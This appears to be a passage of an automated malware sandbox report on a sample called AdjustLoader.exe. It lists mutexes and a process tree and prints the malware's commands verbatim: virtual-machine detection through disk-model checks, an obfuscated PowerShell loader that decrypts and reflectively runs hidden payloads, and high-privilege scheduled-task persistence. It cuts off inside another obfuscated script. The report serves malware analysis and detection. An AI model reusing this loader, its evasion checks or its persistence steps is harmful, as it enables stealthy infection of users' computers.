Code function: 62_3_000002295D53CC34 |
62_3_000002295D53CC34 |
Source: C:\Windows\System32\svchost.exe |
Code function: 62_3_000002295D532398 |
62_3_000002295D532398 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\9539513 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\6624292 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\5549515 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:5820:120:WilError_03 |
Source: C:\Windows\System32\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7808 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\7506200 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\4353117 |
Source: C:\Windows\System32\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5796 |
Source: C:\Windows\System32\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1420 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\b9960528-a89f-46d9-ad7e-4161fbe34b93 |
Source: unknown |
Process created: C:\Users\user\Desktop\AdjustLoader.exe "C:\Users\user\Desktop\AdjustLoader.exe" |
|
Source: C:\Users\user\Desktop\AdjustLoader.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7808 -s 2540 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /sc MONTHLY /tn $nya-Loli_1 /F /RL HIGHEST /tr "wscript.exe 'C:\Windows\$nya-onimai3\$nya-Loli.vbs' 'C:\Windows\$nya-onimai3\$nya-Loli.bat'" |
|
Source: C:\Windows\System32\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-ScheduledTask -TaskName '$nya-Loli_1' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A" |
|
Source: unknown |
Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Windows\$nya-onimai3\$nya-Loli.vbs" "C:\Windows\$nya-onimai3\$nya-Loli.bat" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"Standard PC (Q35 + ICH9, 2009)" /c:"VirtualBox" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1420 -s 2288 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1420 -s 2504 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F |
|
Source: C:\Windows\System32\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5796 -s 2352 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" |
|
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5796 -s 2476 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F |
|
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e |